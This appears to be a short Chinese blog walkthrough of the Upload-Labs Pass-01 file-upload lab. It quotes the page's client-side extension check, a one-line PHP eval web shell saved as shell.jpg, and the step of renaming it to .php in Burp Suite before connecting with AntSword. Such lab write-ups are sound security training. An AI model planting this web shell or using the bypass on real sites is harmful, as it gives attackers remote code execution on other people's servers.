Upload-Labs-Pass-01
今日开始每日一上传,哈哈哈哈哈哈哈
环境搭建
- Windows 7
- phpstudy
文件上传
访问pass_01
右击查看前端源代码,发现一段前端验证
的JS
代码段
<script type="text/javascript">
function checkFile() {
var file = document.getElementsByName('upload_file')[0].value;
if (file == null || file == "") {
alert("请选择要上传的文件!");
return false;
}
//定义允许上传的文件类型
var allow_ext = ".jpg|.png|.gif";
//提取上传文件的类型
var ext_name = file.substring(file.lastIndexOf("."));
//判断上传文件类型是否允许上传
if (allow_ext.indexOf(ext_name) == -1) {
var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
alert(errMsg);
return false;
}
}
</script>
简单的写一个一句话,保存为shell.jpg
<?php
@eval($_POST['quail']);
?>
打开BurpSuite
,进行抓包,将请求头的jpg
改成php
,放包.
放完包,回到浏览器,发现出现一个撕裂的图片
使用蚁剑进行连接
查看当前用户
后记
虽然这个特别简单,但是我还是想借助每题一写监督自己坚持下去,加油💪!